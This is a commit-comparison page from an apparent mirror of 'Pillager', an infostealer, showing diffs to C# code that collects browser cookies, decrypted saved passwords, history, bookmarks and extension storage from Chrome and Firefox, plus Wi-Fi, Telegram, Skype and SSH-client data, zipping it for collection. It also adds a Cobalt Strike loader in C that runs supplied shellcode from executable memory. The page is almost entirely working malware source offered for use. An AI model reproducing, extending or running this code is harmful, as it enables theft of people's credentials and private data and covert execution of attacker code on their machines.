qwqdanchun
/
Pillager
mirror of https://github.com/qwqdanchun/Pillager.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: qwqdanchun:24ddfbdf96e6ae8f787256fc27652e5ad135b464
Branches Tags
qwqdanchun:main
qwqdanchun:AutoBuild
...
compare: qwqdanchun:a0b85725aa2b9534e39d04f64461863ec579ae6b
Branches Tags
qwqdanchun:main
qwqdanchun:AutoBuild

3 Commits
24ddfbdf96 ... a0b85725aa

Author SHA1 Message Date
簞純 a0b85725aa Update FireFox.cs 2023-11-07 21:21:12 +08:00
簞純 8bf0b439d2 fix bugs 2023-11-07 20:36:10 +08:00
簞純 78d97d14da Create scloader.c 2023-11-07 19:18:46 +08:00
4 changed files with 181 additions and 165 deletions
Show Stats Expand all files Collapse all files

15
Pillager/Browsers/Chrome.cs
View File

@ -222,7 +222,7 @@ namespace Pillager.Browsers
public static void Save(string path)
{
foreach (var browser in Chrome.browserOnChromium)
foreach (var browser in browserOnChromium)
{
try
{
@ -230,7 +230,7 @@ namespace Pillager.Browsers
BrowserName = browser.Key;
BrowserPath = chromepath;
MasterKey = GetMasterKey();
if (MasterKey == null) return;
if (MasterKey == null) continue;
string savepath = Path.Combine(path, BrowserName);
Directory.CreateDirectory(savepath);
string cookies = Chrome_cookies();
@ -241,9 +241,14 @@ namespace Pillager.Browsers
if (!String.IsNullOrEmpty(passwords)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_passwords.txt"), passwords);
if (!String.IsNullOrEmpty(books)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_books.txt"), books);
if (!String.IsNullOrEmpty(history)) File.WriteAllText(Path.Combine(savepath, BrowserName + "_history.txt"), history);
if (Directory.Exists(Path.Combine(BrowserPath, "Local Storage"))) Methods.CopyDirectory(Path.Combine(BrowserPath, "Local Storage"), Path.Combine(savepath, "Local Storage"), true);
if (Directory.Exists(Path.Combine(BrowserPath, "Local Extension Settings"))) Methods.CopyDirectory(Path.Combine(BrowserPath, "Local Extension Settings"), Path.Combine(savepath, "Local Extension Settings"), true);
if (Directory.Exists(Path.Combine(BrowserPath, "Sync Extension Settings"))) Methods.CopyDirectory(Path.Combine(BrowserPath, "Sync Extension Settings"), Path.Combine(savepath, "Sync Extension Settings"), true);
foreach (var profile in profiles)
{
Directory.CreateDirectory(Path.Combine(BrowserPath, profile));
if (Directory.Exists(Path.Combine(BrowserPath, profile+"\\Local Storage"))) Methods.CopyDirectory(Path.Combine(BrowserPath, profile + "\\Local Storage"), Path.Combine(savepath, profile + "\\Local Storage"), true);
if (Directory.Exists(Path.Combine(BrowserPath, profile+"\\Local Extension Settings"))) Methods.CopyDirectory(Path.Combine(BrowserPath, profile + "\\Local Extension Settings"), Path.Combine(savepath, profile + "\\Local Extension Settings"), true);
if (Directory.Exists(Path.Combine(BrowserPath, profile + "\\Sync Extension Settings"))) Methods.CopyDirectory(Path.Combine(BrowserPath, profile + "\\Sync Extension Settings"), Path.Combine(savepath, profile + "\\Sync Extension Settings"), true);
if (Directory.GetDirectories(Path.Combine(BrowserPath, profile)).Length == 0) Directory.Delete(Path.Combine(BrowserPath, profile));
}
}
catch { }
}

63
Pillager/Browsers/FireFox.cs
View File

@ -19,17 +19,11 @@ namespace Pillager.Browsers
public static string FireFox_cookies()
{
StringBuilder cookies = new StringBuilder();
string firefox_cookie_path = "";
foreach (var directory in Directory.GetDirectories(BrowserPath))
{
string tmp = Path.Combine(directory, "cookies.sqlite");
if (File.Exists(tmp))
string firefox_cookie_path = Path.Combine(directory, "cookies.sqlite");
if (File.Exists(firefox_cookie_path))
{
firefox_cookie_path = tmp;
break;
}
}
if (!File.Exists(firefox_cookie_path)) return null;
try
{
string cookie_tempFile = Path.GetTempFileName();
@ -47,6 +41,8 @@ namespace Pillager.Browsers
File.Delete(cookie_tempFile);
}
catch { }
}
}
return cookies.ToString();
}
@ -54,17 +50,11 @@ namespace Pillager.Browsers
public static string FireFox_history()
{
StringBuilder history = new StringBuilder();
string firefox_history_path = "";
foreach (var directory in Directory.GetDirectories(BrowserPath))
{
string tmp = Path.Combine(directory, "places.sqlite");
if (File.Exists(tmp))
string firefox_history_path = Path.Combine(directory, "places.sqlite");
if (File.Exists(firefox_history_path))
{
firefox_history_path = tmp;
break;
}
}
if (!File.Exists(firefox_history_path)) return null;
try
{
string history_tempFile = Path.GetTempFileName();
@ -79,23 +69,20 @@ namespace Pillager.Browsers
File.Delete(history_tempFile);
}
catch { }
}
}
return history.ToString();
}
public static string FireFox_books()
{
StringBuilder books = new StringBuilder();
string firefox_books_path = "";
foreach (var directory in Directory.GetDirectories(BrowserPath))
{
string tmp = Path.Combine(directory, "places.sqlite");
if (File.Exists(tmp))
string firefox_books_path = Path.Combine(directory, "places.sqlite");
if (File.Exists(firefox_books_path))
{
firefox_books_path = tmp;
break;
}
}
if (!File.Exists(firefox_books_path)) return null;
try
{
string books_tempFile = Path.GetTempFileName();
@ -106,7 +93,7 @@ namespace Pillager.Browsers
for (int i = 0; i < handler.GetRowCount(); i++)
{
var fk = handler.GetValue(i, "fk");
if (fk!="0")
if (fk != "0")
{
fks.Add(fk);
}
@ -124,26 +111,21 @@ namespace Pillager.Browsers
File.Delete(books_tempFile);
}
catch { }
}
}
return books.ToString();
}
public static string FireFox_passwords()
{
StringBuilder password = new StringBuilder();
string loginsJsonPath = "";
string keyDBPath = "";
foreach (var directory in Directory.GetDirectories(BrowserPath))
{
string tmp1 = Path.Combine(directory, "logins.json");
string tmp2 = Path.Combine(directory, "key4.db");
if (File.Exists(tmp1) && File.Exists(tmp2))
string loginsJsonPath = Path.Combine(directory, "logins.json");
string keyDBPath = Path.Combine(directory, "key4.db");
if (File.Exists(loginsJsonPath) && File.Exists(keyDBPath))
{
loginsJsonPath = tmp1;
keyDBPath = tmp2;
break;
}
}
if (!File.Exists(loginsJsonPath)|| !File.Exists(keyDBPath)) return null;
try
{
string password_keyDB_tempFile = Path.GetTempFileName();
@ -155,7 +137,7 @@ namespace Pillager.Browsers
Asn1Der asn = new Asn1Der();
for (int i = 0; i < handler.GetRowCount(); i++)
{
if (handler.GetValue(i, "id")!="password") continue;
if (handler.GetValue(i, "id") != "password") continue;
byte[] item2Byte;
var globalSalt = Convert.FromBase64String(handler.GetValue(i, "item1"));
try
@ -212,6 +194,9 @@ namespace Pillager.Browsers
File.Delete(password_loginsJson_tempFile);
}
catch { }
}
}
return password.ToString();
}
@ -308,8 +293,8 @@ namespace Pillager.Browsers
if (File.Exists(Path.Combine(directory, "storage-sync-v2.sqlite")))
{
File.Copy(Path.Combine(directory, "storage-sync-v2.sqlite"), Path.Combine(savepath, "storage-sync-v2.sqlite"));
if (File.Exists(Path.Combine(directory, "storage-sync-v2..sqlite-shm")))
File.Copy(Path.Combine(directory, "storage-sync-v2..sqlite-shm"), Path.Combine(savepath, "storage-sync-v2..sqlite-shm"));
if (File.Exists(Path.Combine(directory, "storage-sync-v2.sqlite-shm")))
File.Copy(Path.Combine(directory, "storage-sync-v2.sqlite-shm"), Path.Combine(savepath, "storage-sync-v2.sqlite-shm"));
if (File.Exists(Path.Combine(directory, "storage-sync-v2.sqlite-wal")))
File.Copy(Path.Combine(directory, "storage-sync-v2.sqlite-wal"), Path.Combine(savepath, "storage-sync-v2.sqlite-wal"));
break;

18
Pillager/Program.cs
View File

@ -19,6 +19,15 @@ namespace Pillager
if (File.Exists(savezippath)) File.Delete(savezippath);
Directory.CreateDirectory(savepath);
//Browsers
IE.Save(savepath);
OldSogou.Save(savepath);//SogouExplorer < 12.x
Chrome.Save(savepath);
FireFox.Save(savepath);
//Others
Wifi.Save(savepath);
//Tools
MobaXterm.Save(savepath);
Xmanager.Save(savepath);
@ -28,15 +37,6 @@ namespace Pillager
Telegram.Save(savepath);
Skype.Save(savepath);
//Browsers
IE.Save(savepath);
OldSogou.Save(savepath);//SogouExplorer < 12.x
FireFox.Save(savepath);
Chrome.Save(savepath);
//Others
Wifi.Save(savepath);
//ZIP
ZipFile.CreateFromDirectory(savepath, savezippath);
Directory.Delete(savepath, true);

26
cs-plugin/module/scloader.c Normal file
View File

@ -0,0 +1,26 @@
#include <windows.h>
#include "beacon.h"
DECLSPEC_IMPORT LPVOID WINAPI KERNEL32$VirtualAlloc(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$WriteProcessMemory(HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesWritten);
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateThread(LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId);
DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$GetCurrentProcess (VOID);
VOID go(
IN PCHAR Buffer,
IN ULONG Length
)
{
datap parser;
LPBYTE lpShellcodeBuffer = NULL;
DWORD dwShellcodeBufferSize = 0;
LPVOID pMem;
SIZE_T bytesWritten = 0;
DWORD dwThreadId = 0;
BeaconDataParse(&parser, Buffer, Length);
lpShellcodeBuffer = (LPBYTE) BeaconDataExtract(&parser, (int*)(&dwShellcodeBufferSize));
pMem = KERNEL32$VirtualAlloc(0, dwShellcodeBufferSize,MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
KERNEL32$WriteProcessMemory(KERNEL32$GetCurrentProcess(), pMem, lpShellcodeBuffer, dwShellcodeBufferSize, &bytesWritten);
KERNEL32$CreateThread(0, 0, pMem, 0, 0, &dwThreadId);
}